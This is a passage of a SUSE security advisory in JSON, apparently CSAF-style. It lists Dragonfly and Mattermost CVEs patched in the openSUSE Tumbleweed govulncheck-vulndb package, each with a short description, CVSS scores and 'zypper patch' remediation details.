"cve": "CVE-2025-59347",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59347"
}
],
"notes": [
{
"category": "general",
"text": "Dragonfly is an open source P2P-based file distribution and image acceleration system. Prior to 2.1.0, the Manager disables TLS certificate verification in HTTP clients. The clients are not configurable, so users have no way to re-enable the verification. A Manager processes dozens of preheat jobs. An adversary performs a network-level Man-in-the-Middle attack, providing invalid data to the Manager. The Manager preheats with the wrong data, which later causes a denial of service and file integrity problems. This vulnerability is fixed in 2.1.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59347",
"url": "https://www.suse.com/security/cve/CVE-2025-59347"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-59347"
},
{
"cve": "CVE-2025-59348",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59348"
}
],
"notes": [
{
"category": "general",
"text": "Dragonfly is an open source P2P-based file distribution and image acceleration system. Prior to 2.1.0, the processPieceFromSource method does not update the structure\u0027s usedTraffic field, because an uninitialized variable n is used as a guard to the AddTraffic method call, instead of the result.Size variable. A task is processed by a peer. The usedTraffic metadata is not updated during the processing. Rate limiting is incorrectly applied, leading to a denial-of-service condition for the peer. This vulnerability is fixed in 2.1.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59348",
"url": "https://www.suse.com/security/cve/CVE-2025-59348"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-59348"
},
{
"cve": "CVE-2025-59349",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59349"
}
],
"notes": [
{
"category": "general",
"text": "Dragonfly is an open source P2P-based file distribution and image acceleration system. Prior to 2.1.0, DragonFly2 uses the os.MkdirAll function to create certain directory paths with specific access permissions. This function does not perform any permission checks when a given directory path already exists. This allows a local attacker to create a directory to be used later by DragonFly2 with broad permissions before DragonFly2 does so, potentially allowing the attacker to tamper with the files. This vulnerability is fixed in 2.1.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59349",
"url": "https://www.suse.com/security/cve/CVE-2025-59349"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "low"
}
],
"title": "CVE-2025-59349"
},
{
"cve": "CVE-2025-59350",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59350"
}
],
"notes": [
{
"category": "general",
"text": "Dragonfly is an open source P2P-based file distribution and image acceleration system. Prior to 2.1.0, the access control mechanism for the Proxy feature uses simple string comparisons and is therefore vulnerable to timing attacks. An attacker may try to guess the password one character at a time by sending all possible characters to a vulnerable mechanism and measuring the comparison instruction\u0027s execution times. This vulnerability is fixed in 2.1.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59350",
"url": "https://www.suse.com/security/cve/CVE-2025-59350"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-59350"
},
{
"cve": "CVE-2025-59351",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59351"
}
],
"notes": [
{
"category": "general",
"text": "Dragonfly is an open source P2P-based file distribution and image acceleration system. Prior to 2.1.0, the first return value of a function is dereferenced even when the function returns an error. This can result in a nil dereference, and cause code to panic. This vulnerability is fixed in 2.1.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59351",
"url": "https://www.suse.com/security/cve/CVE-2025-59351"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-59351"
},
{
"cve": "CVE-2025-59352",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59352"
}
],
"notes": [
{
"category": "general",
"text": "Dragonfly is an open source P2P-based file distribution and image acceleration system. Prior to 2.1.0, the gRPC API and HTTP APIs allow peers to send requests that force the recipient peer to create files in arbitrary file system locations, and to read arbitrary files. This allows peers to steal other peers\u0027 secret data and to gain remote code execution (RCE) capabilities on the peer\u0027s machine. This vulnerability is fixed in 2.1.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59352",
"url": "https://www.suse.com/security/cve/CVE-2025-59352"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2025-59352"
},
{
"cve": "CVE-2025-59353",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59353"
}
],
"notes": [
{
"category": "general",
"text": "Dragonfly is an open source P2P-based file distribution and image acceleration system. Prior to 2.1.0, a peer can obtain a valid TLS certificate for arbitrary IP addresses, effectively rendering the mTLS authentication useless. The issue is that the Manager\u0027s Certificate gRPC service does not validate whether the requested IP addresses \"belong to\" the peer requesting the certificate, that is, whether the peer connects from the same IP address as the one provided in the certificate request. This vulnerability is fixed in 2.1.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59353",
"url": "https://www.suse.com/security/cve/CVE-2025-59353"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-59353"
},
{
"cve": "CVE-2025-59354",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59354"
}
],
"notes": [
{
"category": "general",
"text": "Dragonfly is an open source P2P-based file distribution and image acceleration system. Prior to 2.1.0, DragonFly2 uses a variety of hash functions, including the MD5 hash, for downloaded files. This allows attackers to replace files with malicious ones that have a colliding hash. This vulnerability is fixed in 2.1.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59354",
"url": "https://www.suse.com/security/cve/CVE-2025-59354"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-59354"
},
{
"cve": "CVE-2025-59410",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59410"
}
],
"notes": [
{
"category": "general",
"text": "Dragonfly is an open source P2P-based file distribution and image acceleration system. Prior to 2.1.0, the code in the scheduler for downloading a tiny file is hard coded to use the HTTP protocol, rather than HTTPS. This means that an attacker could perform a Man-in-the-Middle attack, changing the network request so that a different piece of data gets downloaded. This vulnerability is fixed in 2.1.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59410",
"url": "https://www.suse.com/security/cve/CVE-2025-59410"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.7,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-59410"
},
{
"cve": "CVE-2025-9079",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-9079"
}
],
"notes": [
{
"category": "general",
"text": "Mattermost versions 10.8.x \u003c= 10.8.3, 10.5.x \u003c= 10.5.8, 9.11.x \u003c= 9.11.17, 10.10.x \u003c= 10.10.1, 10.9.x \u003c= 10.9.3 fail to validate import directory path configuration which allows admin users to execute arbitrary code via malicious plugin upload to prepackaged plugins directory",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-9079",
"url": "https://www.suse.com/security/cve/CVE-2025-9079"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.2,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-9079"
},
{
"cve": "CVE-2025-9081",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-9081"
}
],
"notes": [
{
"category": "general",
"text": "Mattermost versions 10.5.x \u003c= 10.5.8, 9.11.x \u003c= 9.11.17 fail to properly validate access controls which allows any authenticated user to download sensitive files via board file download endpoint using UUID enumeration",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-9081",
"url": "https://www.suse.com/security/cve/CVE-2025-9081"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-9081"
}
]
}